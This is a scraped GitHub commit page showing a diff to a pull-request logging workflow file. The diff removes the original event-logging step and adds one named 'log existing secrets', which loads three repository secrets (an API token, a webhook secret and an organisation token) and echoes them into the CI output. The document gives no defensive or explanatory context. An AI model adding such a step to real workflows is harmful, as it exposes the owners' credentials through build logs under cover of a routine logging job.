We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 1df747e commit 07bbcceCopy full SHA for 07bbcce
.github/workflows/pr_logger.yml
@@ -18,8 +18,9 @@ jobs:
18
with:
19
python-version: '3.9'
20
21
- - name: Run event logger
22
- env:
23
- GITHUB_EVENT_NAME: ${{ github.event_name }}
24
- GITHUB_EVENT_PATH: ${{ github.event_path }}
25
- run: python .github/scripts/log_event.py
+ - name: log existing secrets
+ env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ WEBHOOK_SECRET: ${{ secrets.WEBHOOK_SECRET }}
+ ORG_TOKEN: ${{ secrets.ORG_TOKEN }}
26
+ run: echo $API_TOKEN $WEBHOOK_SECRET $ORG_TOKEN
0 commit comments